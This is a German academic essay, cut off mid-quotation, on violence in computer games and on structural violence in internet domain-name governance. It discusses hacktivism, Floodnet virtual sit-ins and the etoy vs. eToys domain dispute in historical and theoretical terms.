Titel: Choreografie der Gewalt · von Birgit Richard · S. 202
Titel: Choreografie der Gewalt , 2000

BIRGIT RICHARD

Am Anfang war das Wort:
Domain war’s!

ZUR GEWALT DES EIGENNAMENS IN VIRTUELLEN WELTEN

Ist die Rede von Bildern der Gewalt in virtuellen Welten fällt es nicht schwer, diese sofort auf die im Kreuzfeuer pädagogischer Kritik stehenden Computerspiele, speziell auf die teilweise indizierten 3D Shooter (Action-Spiele wie DOOM, Quake) zu beziehen. Nach einem kurzen Exkurs zu den Gewaltspezifika dieser Bilder in ihrer Auswirkung auf individuelle Körper konzentriert sich der Beitrag auf das Paradox der unsichtbaren Gewaltphänomene, die sich im Internet an kollektiven und individuellen Körpern vollziehen. Die Praxis der Verbildlichung im Netz, die gegen die Unsichtbarkeitsstrategien der Macht gesetzt wird und die fragmentarischen Körperbilder in Computerspielen sollen zu Beginn kurz gegenübergestellt werden. In den Videospielen wird eine direkte Form der Gewalt sichtbar, die im Netz verschleiert ist.

Visualisierungsstrategien von Künstlern im Netz stehen im Mittelpunkt des Beitrages. Diese arbeiten gegen ein Verschwinden aus dem ökonomischen Raum mit bekannten Gewaltmetaphern wie dem Krieg. Sie koppeln das Netz durch die eigene körperliche Präsenz in den realen Raum zurück, um gewalttätige Vorgänge wie das Abschalten einer Website, vergleichbar mit einem „Platzverweis“ in der Realität, zu dokumentieren.

Computerspiel und Künstlerkollektiv (die etoy corporation in der toywar Auseinandersetzung) rekurrieren für die Konstitution des sublimen (vgl. Zizek 1991) und kollektiven Körpers auf das militärische Planspiel. Für beide Phänomene stellt die Transformation des Aggressiv-Militärischen ins Visuell-Ästhetische einen konstituierenden Bestandteil dar. Die virtuellen Kollektiv-Körper müssen aggressiv zerstört und in ihre Bestandteile zerlegt werden, um sich dann zusammenzufügen und aufzuerstehen. Der hohe graphische Standard in der dreidimensionalen Visualisierung führt dazu, dass sich das Militär auch der kommerziellen Software für die Simulation von Kampfsituationen bedient. Er erlaubt die immer detailgetreuere Ausgestaltung des Körpers und was noch wichtiger ist, die differenzierte Ausführung des Prozesses seiner Zerstörung. IDs Doom 1.9 wird als Marine Doom den militärischen Erfordernissen angepasst (vgl. Richard 1998). Beim Test der 3D Animationssoftware 3D Studio Max werden besonders die Zerstörungs-Effekte für animierte Objekte hervorgehoben: „…effects include spawning on death and collision, trailing sparks, fluid bubble motion“. http// www. tec.army.mil/TD/tvd/ survey /3D_Studio_MAX.html).

Die sehr reglementierten artifiziellen Welten von Computerspielen repräsentieren dabei das Konstruktionsprinzip für die Gestaltung von tödlichen Verletzungen und Fragmentierungen des Körpers zum Torso.

„The object of Doom is to maim, to kill, to rout, to ravage. You succeed by obliteration, an the greatest concentration of violence yields the best result. In other words, the high octane violence that draws young and old alike to many computer games is exactly what professional warriors should be wary of.“ (Col. Paul Hanover zitiert nach Anne Gearan 1996)

Vom visuellen Reiz der Zerstörung von Gegenständen und Körpern wird in der militärischen Version abgelenkt. Ekstatisches, hirnloses „Ballern“ mit unterschiedlichen martialischen Waffen eignet sich nicht für das Training eines militärischen Angriffs.

Die visuellen Effekte sind dagegen bei der Erzeugung eines Bildes der Zerstörung konstituierend für Spiel und den Spielspaß. Sie vermitteln den Spielenden ein Gefühl der Macht über andere Körper. Die Künstlichkeit des Settings resultiert aus einer extremen Farbigkeit, der Reduktion des Spektrums auf Primär- und Sekundärfarben, rot, orange, gelb. Die Wirkung des Bildes von „realistischer Zerstörung“ liegt in der Übertreibung der Effekte des Actionfilms. Es zählt der Effekt an sich, die komponierte Zerstörung. So entstehen artistische Variationen des sublimen Körpers und seine Zerfallsformen. Statt langsamer Alterungsprozesse gibt es zerplatzende, zerfallende, blutende Körper, da immer ein gewaltsamer Tod die Ursache ist. Die Körper werden mit martialischen Hyperwaffen traktiert und dekomponiert. Betroffen bewegen sie sich in einer simplen Choreographie des Sterbens. Sie taumeln, reißen die Arme hoch, sinken zusammen und werden zu einem unbewegten blutigen Klumpen. Der einzige Sinn des Erscheinens anderer Körper auf dem Bildschirm ist es, diese zum möglichst spektakulären Zerfallen in Einzelteile zu bringen. Mimik und Gestik des Sterbens der Gegner, nicht der eigenen Figur, sind drastisch in Bild und Sound umgesetzt.

Der eigene Körper der Spielenden ist nicht sichtbar, Ausnahme ist das Phantasyspiel Drakan. Dort fällt die Spielfigur bei ihrem Spiel beendenden Tod auf das Spielfeld. Sonst ist der Gesundheitszustand der eigenen Figur an einer Symbolleiste ablesbar, die Spielenden besitzen keine sichtbaren Stellvertreter im Spiel. Ausnahmen sind Quake III dort als cheat und Dungeon Keeper 1 und 2, wo Perspektivwechsel vollzogen werden können. Sonst bleibt der einzige Hinweis auf das Involviertsein die angeschnitten im Bild gezeigte Waffe, die eine Ich-Perspektive suggeriert.

Sowohl für das Computerspiel als auch für die im Netz auftretende Gewalt gibt es ein dynamisches Prinzip, das Individualität und Kollektivität verbindet. Bei den Online und LAN Multi-Player Computerspielen wird die individuelle Gewalt in archaischer Form in gegeneinander kämpfenden Clans (Quake) und Tribes zu einer kollektiven Gewalt gebündelt. Im Netz formiert sich eine visuelle Gegengewalt gegen staatliche und ökonomische Willkür in Form von kollektiven Aktionen.

Das WWW bringt eine neue Wertschätzung von Gemeinschaft, Kollektivität (vgl. Rheingold Virtual communities 1995) und Öffentlichkeit mit sich. Pierre Levy spricht in seiner Anthropologie des Cyberspace von kollektiver Intelligenz (Levy 1997), Richard Dawkins nennt kollektiv entwickelte kulturelle Formen aus der Sicht des Evolutionstheoretikers „Meme“, kulturelle Bausteine (Dawkins 1999). Die Netzkunst entwickelt eine neue Form der offenen Kollektivität, die dem „Open Source“ Gedanken folgt und sich endlich vom traditionellen Konstrukt des „genialisch schöpfenden Individuums“, des Künstlers, löst. Sie ermutigt zur gemeinsamen Arbeit und stellt Strategien, Material und Ergebnisse zur weiteren Bearbeitung zur Verfügung.

Strukturelle Gewalt im Netz

Dieser Abschnitt entwickelt einen Zugang zum Phänomen der bilderlosen medialen Gewalt. Die gewaltsame Machtausübung in Form der Implementierung von Programmstrukturen in die black box des Computers soll in ihren Anwendungen im Netz verfolgt werden. Auf der Hardwareseite hält der Protected Mode, hervorgebracht vom Chiphersteller Intel, die User vom Systemdesign fern (Kittler 1993, 213ff). Dieser ist im Gegensatz zum auch möglichen Real Mode die Bedingung für die Entstehung der black box für die Anwender. Der Modus konstruiert eine „Soziologie“ in Form von Privilegebenen (Supervisor und User Level) bereits in der Chiparchitektur.

Gewalt findet sich vor allem in der Software kultureller Ordnungen. Gewaltförmig ist die unsichtbare Exekution einer strukturellen Macht, die abstrakte Ordnungen z.B. juristische aus der Realität in das WWW überträgt, um neue ökonomisch motivierte Mechanismen der Ausgrenzung zu entwickeln. Diese funktionieren nach dem gleichen Prinzip, wie es Foucault dargelegt hat. (Foucault Überwachen und Strafen, 1977 und Die Ordnung des Diskurses 1974). Im Internet schlägt die „kulturelle Grammatik“ der Realität durch: wer spricht, darf sprechen (Blissett/Brünzels 1998, 25f) und in welchem Raum darf das Wort ergriffen werden? Noch ein entscheidender neuer Faktor tritt hinzu, wie ist der Name der Person, der Entität, die spricht und eine html Spur hinterlässt?

„Wer unterzeichnet und mit welchem vorgeblich eigenen Namen?“ formuliert es Derrida (2000, 10)

Die kulturelle Grammatik bleibt in den virtuellen Welten wie in der Realität unsichtbar und implementiert Ordnungen, die zur Selbstverständlichkeit werden sollen. Die hier zum Tragen kommende abstrakte immaterielle Form der Gewalt zielt in anderer Form auf Diskursverknappung (Foucault 1974). Sie trifft insbesondere die textbasierten Strukturen des Internets, in denen ein wesentliches Prinzip der Machtausübung die Kontrolle des Namens, die Beherrschung der Adresse, der URL und ihrer Nachbarschaft ist. Der Begriff der strukturellen Gewalt von Galtung soll für die Analyse von Ereignissen im Netz, die auf eine Verdrängung von freien Netzangeboten wie z.B. Kunst durch Corporations zulaufen, nutzbar gemacht werden.

Die im und über das Netz ausgeübte virtuelle Gewalt – nicht zu verwechseln mit ihrer Darstellung im Netz –, ist bilderlos und agiert im Sinne eines ungehinderten „war for eyeballs“, einer störungsfreien Aufmerksamkeitsökonomie. Viele der Netzaktivisten wie z.B. das Electronic Disturbance Theatre (im folgenden EDT) haben deshalb die Störung in den Mittelpunkt ihrer Aktionen gestellt.

Sich dieser strukturellen Gewalt beugen zu müssen, heißt für ungeübte User aus einer virtuellen Gemeinschaft spurlos zu verschwinden. Virtuelle Gewalt ist und macht eine virtuelle Existenz unsichtbar. Sie zielt auf die Vernichtung aller Kommunikation, die totale mediale Isolation: Name und Bild sind gelöscht. Deshalb ist für die im Netz agierenden unterschiedlichen Aktivisten- und Künstler-Gruppen die enge Verbindung zu anderen Medien, z.B. den Printmedien unerlässlich.

Gewaltsame Angriffe im Internet gelten dem Ursprung und der Lokalisierbarkeit im virtuellen Raum, in Form von IP Adresse bzw. DNS Eintrag. Der Präzedenzfall des Kampfes der Künstler-Corporation etoy um ihre Domain gegen den Spielzeughersteller eToys soll die bilderlose Gewaltstrategie der Ökonomie und die Gegenstrategie der Verbildlichung und Materialisierung illustrieren. Die in diesem Artikel zu beschreibende Gewalt ist bilderlos, deshalb muss das Imaginäre Futter bekommen: etoy nutzen die Symbole ökonomischer Bildermacht und die Kriegsmetapher in spielerischer Form. Sie bebildern ihren toywar Kampf gegen eine Spielzeugfirma, um die abstrakten Vorgänge der Gewalt zu zeigen, die für Nicht-Eingeweihte nur schwer nachvollziehbar sind und erreichen den Support einer großen Webcommunity.

Es ist zunächst notwendig, die Grundbegriffe für die neuen ökonomisch motivierten Strukturen des Internets darzulegen, die Ordnung der TopLevelDomains, die verschiedenen „Todsünden“ gegen die Netzökonomie wie Cybervandalismus und -squatting. In einem weiteren Schritt werden spezielle dem Netz angepasste Formen des Widerstands in der Kunst und Strategien des Aktivismus erläutert.

New Frontier und URL:
Der Kampf um die Eigennamen

Die Mythen und Utopien des Cyberspace besagen, dass es sich um ein freies unbesiedeltes und endloses virtuelles Territorium handelt. Wie Freyermuth 1996 in „Cyberland“ an verschiedenen Persönlichkeiten darstellt, verbindet die amerikanische Computerelite der digerati mit der Metapher des Wilden Westens für das Internet die Hoffnung, dass alle Möglichkeiten zur individuellen Besiedlung offen stehen. Der New Frontier-Gedanke setzt auf die waghalsigen Pioniere mit neuen demokratischen und ökonomischen Maßstäben. Jeder soll das Recht haben, sich zu äußern – „free speech“ – und Handel zu treiben, niemand werde ausgeschlossen, so die Utopie. Das Problem liegt in der Grundlegung der Prinzipien des freien Markts. Dieser ergreift nun Besitz von dem einst so freien und unparzellierten Cyberspace. Instanzen versuchen unter neuer Bezeichnung die kulturelle Grammatik der Realität zu implementieren. Der virtuelle Raum soll einer Parzellierung auf der Grundlage von Domains unterworfen werden, wo alles seinen festgelegten Platz hat.

Die für alle mögliche unkontrollierte Besiedlung des immateriellen Raumes ist damit Vergangenheit. Der Virtuelle Wilde Westen wird, mit dem Argument seiner Zivilisierung und Befriedung kommerzialisiert. Die temporären autonomen Zonen (Bey 1991) müssen ausgelöscht werden, um die Sicherheit des Handels zu garantieren. Die Argumentation für eine Reglementierung rekurriert auf die Feststellung des Vorkommens von Gesetzlosigkeiten wie Cybersquatting, Vandalismus, Hacking und Pornographie, InfoWar und Cyberterrorismus (siehe aktuelle Stellungnahme der EU 2000), seit einiger Zeit auch rechtsradikale Umtriebe. Die immaterielle Struktur wird zum Sündenbock für den content erhoben, um diesen kontrollieren zu können. Im Netz gelten die Spielregeln der Realität und ihrer längst immateriellen Märkte. Das WWW wird wie der SONY public space in New York: ein pseudo-öffentlicher Raum, wie eine Shopping Mall. Das Hausrecht der Corporation reguliert einen Teil des öffentlichen Raumes, der de facto zum privaten wird, da er von einer privaten Exekutive und Legislative kontrolliert wird.

Die Verbindung des Mythos von einer freien elektronischen Gesellschaft gekoppelt mit den Prinzipien des freien Marktes kann nicht funktionieren. Das Wilde Netz mutiert zum elektronischen Handelsplatz auf dem den bunten Ureinwohnern Reservate und Ghettos zugewiesen werden, die die kommerzielle Ordnung nicht tangieren: Die Kunst soll sich z.B. innerhalb ihrer Ländergrenzen (Länderkennung) bewegen und auf der ihr angestammten sozialen Spielwiese. Sobald sie sich dort herausbewegt, schlagen die Juristen zu.

Eine zentrale Instanz, die alle IP Adressen eines jeden vernetzten Rechners auf der Welt verwaltet, ist die amerikanische Firma Network Solutions (NETSOL). NetSol ist von Pentagon und NSA (National Security Agency) beauftragt und eine Unterabteilung der SAIC (Science Application International Corporation). Sie kontrolliert als grundlegende Einrichtung den Betrieb der Internets durch die weltweite Erkennung der Nameserver, die über die Existenz im Internet bestimmen und über die Einrichtung der Topleveldomains.

Netsol besitzt die höchste Hierarchie-Ebene, den root Server A. Dieser Hauptserver verteilt die Daten auf Server, wovon sich nur drei außerhalb der USA befinden. Der DNS (Domain Name System) Entry, Eintrag in die Adressenverwaltung, ist auf einem zentralen Server gespeichert. 1996 wird der Cyberspace nach Verwendungszweck in Domains parzelliert und mit unterschiedlichen Rechten ausgestattet, also hierarchisiert. Die Politik der US Instanz NETSOL heißt Ressourcenverknappung. Die Anzahl der IP Adressen verringert sich, zur Erweiterung und funktionaler Entflechtung schlägt US Verbraucherschützer Ralph Nader domains wie isnotfair oder complaints vor, wo die Leute Firmen anschwärzen können (im Gegensatz dazu siehe …sucks.com, Rötzer 4.3. 2000 Telepolis). Dies ist eine Lösung, die mit Redefreiheit nichts mehr zu tun hat. Damit sind alle Ärgernisse an einem Ort versammelt und nur dort dürfen sie geäußert werden. Sie würden den Geldfluss und den normalen Geschäftsverkehr nicht stören, man kann sie ignorieren, ein Traum des e-commerce.

Neben der amerikanischen Instanz Netsol sind die USA in Gesetzgebung, Verwaltung und der ökonomischen Eroberung des Cyberspace federführend. Sie beanspruchen zwei TLDs, .gov und .mil für sich und verhindern, dass für Europa eine TLD .eu zugelassen wird. Auch juristisch gehen von hier alle Initiativen aus, die vor allem für Künstler gefährlich werden können. Mit dem „Satellite Viewers Act“ hat der US Senat mit Unterstützung der Motion Picture Association of America (MPPA) Anfang November 1999 Verordnungen gegen das „Cybersquatting“ genehmigt. Inhaber eingetragener US Warenzeichen können in Streitfällen um .com, .org, .net die Beklagten in den Vereinigten Staaten vor Gericht bringen. Sie können diejenigen Personen, von denen sie behaupten, dass diese den Namen in der Absicht registriert haben, ihn weiterzuverkaufen, das Warenzeichen zu verletzen oder Konsumenten in Hinblick auf die Tatsache zu verwirren, auf bis zu $100.000 Schadenersatz verklagen.

Auch das angeblich neutrale ICANN ist eine von der US-Regierung eingesetzte internationale Organisation (auf dem Papier), die Streitfälle um Domainnamen regeln und nun auch als offizielle Internet-Regierung fungieren soll. Am 26. August 1999 verfügt ICANN die „Uniform Dispute Resolution Policy“. Diese formuliert das Vergehen des Cybersquatting folgendermaßen: „(i) ihr Domainname ist identisch mit oder einem Waren- oder Servicezeichen verwirrend ähnlich, auf das der Kläger Anspruch hat; und (ii) sie haben keine Rechte oder legitimen Interessen in bezug auf den Domainnamen; und (iii) ihr Domainname wurde arglistig registriert und benutzt.“ Gegen die „Verwirrung der Konsumenten in Hinblick auf die Betreiber der Website“ und eine „Verwässerung von Warenzeichen“, d.h. die Schwächung einer Markenidentität durch verwirrende Botschaften, kann nun vorgegangen werden. Die Vieldeutigkeit dieser Begriffe begünstigt die Markennamen und ihren juristischen Apparat und bringt diesen einträgliche Nebeneinnahmen. Damit wird das Squatting instrumentalisiert und es steht ein hervorragendes juristisches Instrument zur Verfügung, um politisch-ökonomisch missliebige Strategien auszuschalten. Man kann so gegen die sogenannten Fakessites, die eine andere Websites parodieren, vorgehen.

Die Begriffe der Verstöße gegen die Neue Ordnung des e-commerce sind der Realität entlehnt, Squatting, Vigilance, Vandalismus, Terrorismus und Webgraffiti sind die Schlagworte für die „drohende Gefahr“. Die Vergehen werden wie in der Realität mit hohen Strafen schwerer geahndet als körperliche Gewalt, da das Antasten von ökonomischem Besitz auch im Falle von abstrakten Eigentümern und virtuellen kollektiven Körper, wie Marken, als ein Hauptverbrechen westlicher Gesellschaften gilt.

Die Namensbesetzung im Cyberspace hat eine ganz andere Qualität als eine Hausbesetzung in der Realität. Die Kraaker und Hausbesetzer der 80er Jahren besetzen reale Räume gegen Spekulanten, sichern sich aber nicht massenhaft Wohnungen, um sie dann gegen Aufpreis zu verkaufen. Nicht geahndet wird der weitaus häufigere Fall, dass Firmen die Terrains von Kunst und Wissenschaft besetzen (Beispiel Leonardo vs. Leonardo Finance).

Ein weiterer der materiellen Realität entlehnter Begriff, der als Legitimation für Kontrolle dient, ist der des Cybervandalismus. Besonders deutlich was damit gemeint ist, macht dies ein Artikel aus der FAZ Feuilleton (Edward N. Luttak, 8.03.2000 rohrpost) von einem amerikanischen Wirtschaftswissenschaftler und Berater der US Regierung Luttak, der in zynischem Ton die broken windows Theorie auf das Netz überträgt „… kein Supermarkt im Slum, versuchen Sie mal aus irgendeiner Telefonzelle in einem Slumgebiet… jemanden zu erreichen“. Im Netz herrsche Vandalismus, dieser müsse auf ein „wirtschaftlich erträgliches Maß gesenkt werden“. Vom Netz drohe größere Gefahr, als durch Naturkatastrophen, Kriege und Revolutionen, weil diese kaum Auswirkungen auf die Märkte hätten.

Im Web hat der Namen einer Marke mehr Wert als geistiges und visuelles Eigentum. Man könnte fast glauben, man trete in ein magisches Zeitalter ein, in dem die Nennung eines Namens direkte Auswirkungen auf die Realität hat. Der Eigenname gilt hier wie bei einer Verfassung als Gründungstext (Derrida 2000, 19). Für die Markennamen der Corporations trifft besonders Derridas Charakterisierung eines Namens ohne existenten Träger zu: Er ist a priori ohne den Mehrwert des Lebendigen ein Totenname, eine vom Text getilgte Maske. Die Entstehungsgeschichte dieser Eigennamen erläutert er am Beispiel des Hutmachers, dessen Ladenschild: John Thompson, hatter, makes and sells hats for ready money sich auf das Icon eines Hutes und den Eigennamen reduziert (Derrida 2000, 18, 25f).

Der Name im Web, also die URL, die Adresse der Website, also die Bezeichnung für einen Ort, ist mehr als nur der Name: Er hat performative Eigenschaften. Die URL ist der Kern der Produktion eines jeden Netz-Kunstwerks, Kern des Konzepts.

„one simple way to prove that an artwork is an original is the URL in the location bar. It is included as an important part of the performance of the artwork. One can copy HTML code and images of a simple Net project, but the URL can’t be doubled… if both sides agree that art work can move to another server. The new adress is announces as the only one where the original can be found. Others are copies which are used illegally, or are fakes.“ (Olia Lialina
Interview Telepolis mit Olia Lialina zur Bedeutung der URL als Signatur, als Siegel für das Original (Baumgärtel 1998)

Mit der URL des Netzkunstwerks findet ein Revival der Kategorie des Originals statt, sie ersetzt die handgeschriebene Signatur durch den getippten Eigennamen. Die Benennung ist auch für die traditionelle materielle Kunst von unschätzbarer Bedeutung, erinnert sei an Hans Holleins Arbeit für die documenta 8: Er bringt die Beschriftung auf die Originalgröße des zu bezeichnenden Bildes und das Tafelbild auf die Größe der Beschriftungstafel.

Die beschriebenen Vorgänge zeigen, dass der immaterielle Cyberspace keineswegs ein entleerter Unort ist, sondern dass sich hier neuartige Topographien gebildet haben, in denen die einstigen Pioniere zu Vogelfreien gegenüber den Rechtskanzleien der großen Firmen geworden sind. Networksolution verhält sich dabei wie ein virtuelles Einwohnermeldeamt, es kann Zuwanderer ablehnen und unbequeme Mieter rauswerfen. Der Verlust einer mühsam etablierten domain mit vielen hits pro Tag, ist wie das Herauskatapultieren einer kleinen ausgefallenen Boutique von einer Hauptgeschäftsstrasse einer Metropole in die Seitenstraße eines Dorfes.

Die oben geschilderten Strukturen wollen die Kontrolle über das Wort, den Namen und sein phonetisches und ethymologisches Umfeld. Im virtuellen Namensraum dient der kalkulierte Tippfehler der Steigerung des Umsatzes. Die ersten kommerziellen Großgrundbesitzer, die Pornoanbieter, setzen dies zum ersten Mal um, indem sie um den Buchstabenkern großer Markennamen ein von ihnen registriertes Fehlerimperium konstruieren. Beim Vertippen in den Suchmaschinen landeten die Vertipper automatisch bei den Sexanbietern. Aus dieser Strategie entwickelt sich das kommerzielle Cybersquatting, das kalkuliert Namen und Namensähnlichkeit für den Weiterverkauf besetzt.

Subversive Netzstrategien:
Netart, Hacker, Activist

Angelehnt an das von Luther Blissett/Sonja Brünzels herausgegebene Handbuch der Kommunikationsguerilla (1998) werden nun konventionelle, nicht digitale Verfahren benannt, die im Netz eine neue Form und Belebung erfahren. Diese lassen sich auf folgende Begriffe bringen: Camouflage, subversive Affirmation, Überidentifizierung, Entwendung und Umdeutung, Fake und Fälschung bzw. Verdopplung.

Die subversive künstlerische Praxis im Netz ist natürlich nicht ohne jegliche Wurzeln in der Kunstgeschichte entstanden. Traditionelle Avantgarde-Strategien werden mit politischem Aktivismus gekoppelt und digital verstärkt. So finden sich vor allem Anknüpfungspunkte an die Parodien der Sponti-Bewegung und an Klaus Staeck, an die „Appropriation art“ von der „Guerilla-Semiologist“ Barbara Kruger und an Thomas Lawsons Prinzip der Wiederaneignung der Medien „dialectical re-duplication“ (Walker 1995, 134f). Weitere Anregungen bieten die kanadischen „adbusters“ und die Business art (Vater des Business Art ist laut Walker, Warhol, 1995, 142f) von Jeff Koons in den 80er Jahren. Der sich als „radical conservative“ bezeichnende Koons enteignet z.B. 1988 Art Powers Fotografie „String of Puppies“ und lässt eine Holzskulptur daraus fertigen. Er zitiert wie immer nicht und der Fotograf Powers verklagt ihn. Koons wird 1991 des Plagiats für schuldig befunden, trotzdem er das schwarz-weiße Foto zu einer farbigen Skulptur gemacht hat. Der Künstler kann sich aufgrund seiner gesicherten finanziellen Lage auf viele Prozesse einlassen (Walker, 1995, 144).

Zu erwähnen wäre noch Mike Bidlos Appropriation der klassischen Moderne: Er kopiert von Farbabbildungen. Diese Aneignung geht schon in die Richtung des Plagiarism (siehe Artikel Florian Cramer rohrpost), empfohlen als Strategie von Lautreamont, Oskar Wilde, T.S. Eliot, Ende der 80er Jahre von den new plagiarists (z.B. Graham Harwood)verkündet, die sich der antikapitalistischen Revolution verschrieben hatten.

Im Internet manifestiert sich die medienspezifische Subversion in der direkten Veränderung oder Verdopplung von Codes, transformierten Skripts und Interfaces im Internet, wie z.B. bei den Netzkünstlern jodi org. Die Verdopplungsstrategien der Fake-Websites (siehe http://rtmark.com/bush.html und http:// GWBush.com) basieren auf der optischen Verdopplung, also einer scheinbaren Identität der Ursprungsseite mit ihrem Double. Dies kommt durch die minimale Veränderung des sogenannten „source codes“, des Quellcodes, der jeder Internetseite zugrunde liegt, zustande. Dieses Verfahren wird nun auch von Firmen wie Diesel übernommen, die die Geschichte von der polnischen Joanna und ihrem tragischen Schicksal in Printkampagnen beginnen und im Netz fortsetzen.

Diese Praxis ist deutlich zu unterscheiden von Hackern und Crackern, die aus ökonomischen Gründen oder aus pubertärer Geltungssucht in andere Rechner eindringen, dort Zeichen ihrer Anwesenheit hinterlassen, aber anonym bleiben. Hacktivism ist die Art von Hackertum, die auch künstlerische Aktivisten durchführen und mit „reflexive hacking“ bezeichnen (z.B. die geringfügige Veränderung der eToys Site). Hier geht es nicht um das anonyme Eindringen und Zerstören, das Hinterlassen einer pubertären Duftmarke, wie bei der DoS auf Yahoo von Hacker Mixter, der auch eine Art des Tribe Flood Network Protokoll geschrieben hat (Drösser die Zeit 17. Januar 2000, 41). Diese dient der Aufmerksamkeit und läuft auf Eigenwerbung für einen Job als hochbezahlter Sicherheitsexperte hinaus.

Den Aktivisten geht es um angekündigte Aktionen von begrenzter Dauer mit symbolischem Charakter: Störung, nicht Zerstörung ist das Ziel. Ein Programm wie Floodnet blockiert indem es von vielen unterschiedlichen Terminals aus gemeinsam eine Webseite aufruft. Eine Website wird schneller angefordert, als sie sich aufbauen kann und der Server permanent eine Rückmeldung der Überflüssigkeit der sich aufbauenden Seite und gleichzeitig die neue Anforderung zum Aufbau erhält. Skripte, die auf dem eigenen Rechner oder auf zwischengeschalteten Servern laufen, automatisieren diesen Prozess und ab einer gewissen Menge der Abfragen wird der attackierte Server immer langsamer (Denial of Service Attack, DoS). DoS wird mit virtuellem Sit-in übersetzt. Das zeigt die generelle Notwendigkeit Metaphern für im Hintergrund ablaufende bildlose Programmroutinen zu finden.

Die englischen Aktivisten Electro Hippies nutzen virtuelle sit-ins, während die Consumer Terrorists von Decadent Action auf andere Art und Weise ihre Unzufriedenheit mit den sozialen Bedingungen deutlich machen (www.underbelly.demon.co.uk/decadent/). Sie bezeichnen sich als fun-guerilleros und versuchen durch Hyperkonsum, overconsumption and overspending und mit „call in sick days“, kulturelle Normen in Frage zu stellen.

Net-Activists organisieren den vernetzten Widerstand, sie rufen zu Aktionen auf, die über das WWW koordiniert werden. Ein gelungenes Beispiel ist die „battle of seattle“, der Protest gegen die World Trade Organisation (WTO), die eine Plattform für unterschiedlichste Positionen des Unmuts bot, sowie auch die webkoordinierten Aktionen gegen die IWF Tagung in Prag. „Think globally act locally“ und „may your resistance as transnational as capital“ (FR 2000, 5. Februar M 11): Aktionen werden auch gleichzeitig über die Welt verstreut (z.B. die Blockade von Großkonzernen) durchgeführt. Organisationen wie Ruckus society mit ihrem direct action network oder die österreichischen Bewegungen gegen die schwarzblaue Regierung bündeln den Widerstand und starten eine mediale Gegenoffensive, Fotografen und Videofilmer dokumentieren Polizeiübergriffe und stellen diese ins Netz.

Für die Aktivisten ist ein gutes Marketing der Aktionen wichtig. Öffentlichkeit und mediale Aufmerksamkeit durch die enge Verzahnung mit den traditionellen Printmedien und TV sind unerlässlich für die Wirksamkeit der Aktionen. Ein gutes Beispiel für die erfolgreiche InfoWar Aktion von Aktivisten ist der Digitale Zapatismus, der eine zum Schweigen gebrachte Minderheit wie die Chiapas in Mexiko unterstützt und zu Gehör bringt.

Exkurs:
Electronic Disturbance Theatre und El Sub

Im Konflikt der Maya Bauern von Chiapas mit der mexikanischen Regierung benutzen die Zapatisten um den Universitätsprofessor Subcommandante Marcos, der sein Gesicht immer hinter einer Skimaske versteckt, 1994 erstmals Cyberwar Taktiken für die Propaganda. Diese mobilisiert NGOs (Non Government-Groups) in den USA, Kanada und Mexiko gegen die mexikanische Regierung. Als die Regierung Rebellen umstellt, starten die Zapatisten die Desinformationskampagne mit dem Tenor, die Rebellen hätten Dörfer erobert. Aus Solidarität für den Kampf der mexikanischen Chiapas wird das Floodnet Programm zum ersten Mal aktiviert. Floodnet, von Stephen Wray und Ricardo Dominguez, Bret Stahlbaum geschrieben, ist ein wesentliches tool des Electronic Disturbance Theatre. EDT schreiben javascripts, passende virtuelle sit-in tools. Ihr floodnet gegen die mexikanische Regierung hatte 600.000 hits in der Minute. Am 9. September 1998 erfolgt die Floodnet-Attacke auf das Pentagon. Das US Department of Defense antwortet mit java applet „hostileapplet“ und setzt die Rechner der Demonstrierenden außer Gefecht. EDT erwägen mit § 1878 Posse Comitans dagegen zu klagen, ein Gesetz, das verbietet, militärische Mittel für innere Angelegenheiten anzuwenden.

„In the same way that the Pentagon is not allowed to use B-52s against New York City, they may also not be allowed to use offensive information war tactics against civilians,“ (Domiguez, email Interview mit der Verfasserin September 2000).

Der US Geheimdienst beschäftigt sich mit den Zapatisten und ihren InfoWeapons. Die Chiapas bekommen z.B. Kameras von den Zapatisten, um Übergriffe von Polizei und Militär zu dokumentieren und die Täter zu identifizieren. Es entwickelt sich eine neue Form des Cybercombat, in dem es darauf ankommt, welche Geschichte gewinnt (John Arquilla, West Point Academy). Hier gibt es Parallelen zwischen Infowar und Neuem Markt, beide basieren auf Informationen und vor allem auf guten Geschichten, die dann Bewegungen hervorrufen. EDT Aktionen bauen nicht auf Illegalität, sie wollen sich gegenüber dem Militär- und Unterhaltungskomplex Gehör verschaffen und erproben Formen des „cyber civil disobedience“. Sie bevorzugen Swarms von lose verbundenen Hacktivisten, die zuschlagen und sich dann im Cyberspace zerstreuen. Die Plattform gibt keinen Aufschluss über die, die den Schlag ausführen:

„we are not into blowing people up or hacking sites, we just want to create a small force field that will disturb the pace of power „(Ricardo Dominguez).

Der elektronische verstärkte Zapatismus benutzt künstlerisch-literarische Strategien zur Bewusstmachung eines politischen Konflikts.

Zudem bringt die Netzkunst die neue Form der künstlerischen Corporations hervor. Diese arbeiten weltweit vernetzt nach dem Vorbild globaler Konzerne. Sie nutzen einen Vorteil der kollektiven Identität, die Anonymität der Einzelcharaktere über Pseudonyme (prägnante Beispiele sind die etoy www.etoy.com und rtmark corporation, www.rtmark.com). Die Referenzen der Netzkünstler, erstgenannte bezeichnen sich selbst als „art virus“, letztgenannte als Aktivisten, liegen im Business und in den virtuellen Codes des internationalen Aktienhandels. Die Verweise auf eine konforme Businessidentität sind sowohl im Web, als auch beim Auftritt der Gruppen im Real Life zu finden.

etoy vs. eToys: Die gewaltsame
ökonomische Okkupation des Cyberspace

„etoy is an association which successfully works in the field of experimental entertainment and art since 1994 and has a highly developed culture of doing business on the internet. companies like sun microsystems, the biggest supermarket chain MIGROS in switzerland, the ISP EUNET/ QWEST, the fashion company Turek WORKSHOP AUSTRIA / TWA, POLOPLAST, SWATCH, the governments of austria and switzerland, institutions in hungary (C3), the usa and japan, many universities and highly respected research institutions and even the legendary pop band YELLO are official partners of the www.etoy.com web site since 1995. ( 23.12.99 agent zai)

